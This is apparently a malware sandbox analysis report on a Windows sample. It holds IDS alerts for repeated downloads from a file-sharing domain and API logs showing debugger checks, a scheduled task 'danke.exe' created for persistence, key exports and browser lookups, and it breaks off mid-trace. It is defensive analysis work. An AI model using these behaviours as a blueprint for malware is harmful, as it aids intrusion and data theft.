TCP 192.168.56.101:49296 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49334 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49332 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49347 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49297 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49358 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49468 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49266 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49387 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49497 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49220 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49434 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49394 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49510 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49382 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49404 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49418 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49320 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49286 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49316 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49237 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49416 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49342 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49498 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49310 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49210 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49502 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49321 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49439 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49374 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49251 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49337 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49223 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49408 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49431 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49489 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49365 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49524 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49362 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49523 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49482 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49453 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49512 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49469 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49306 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49435 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49249 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49525 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49269 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49357 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "danke.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eae08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eae08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eae08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eae08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eae88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eae88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ead88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ead88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ead88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ead88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ead88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eae08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eae08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb008
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb8c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006eb788
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0041dbf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

buffer: f Ô•?ø¢p'Y÷¢éÒ9\ÁZCÍà?‚¦ÜÀ€% N[
crypto_handle: 0x0041dbf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d730
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d730
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d730
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d730
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d730
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d730
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d730
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d7b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046d970
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046e230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046e230
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0046e0f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path wextract.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x659a71
0x659873
0x657710
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x659ba8
registers.esp: 3009428
registers.edi: 3009480
registers.eax: 0
registers.ebp: 3009492
registers.edx: 7115288
registers.ebx: 3010924
registers.esi: 45984456
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d80f21
0x4d80d82
0x4d80c55
0x65f2d3
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007668
registers.edi: 3007968
registers.eax: 0
registers.ebp: 3007980
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 46347724
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d814ec
0x4d80d82
0x4d80c55
0x65f2d3
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3007956
registers.edi: 3008300
registers.eax: 0
registers.ebp: 3007964
registers.edx: 0
registers.ebx: 3010924
registers.esi: 46347724
registers.ecx: 47597488
1 0 0

__exception__

stacktrace:
0x4d80f21
0x4d80d82
0x4d80c6d
0x65f2d3
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007668
registers.edi: 3007968
registers.eax: 0
registers.ebp: 3007980
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 46347724
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d814ec
0x4d80d82
0x4d80c6d
0x65f2d3
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3007956
registers.edi: 3008300
registers.eax: 0
registers.ebp: 3007964
registers.edx: 0
registers.ebx: 3010924
registers.esi: 46347724
registers.ecx: 49027952
1 0 0

__exception__

stacktrace:
0x4d80f21
0x4d80d82
0x4d80c6d
0x65f2d3
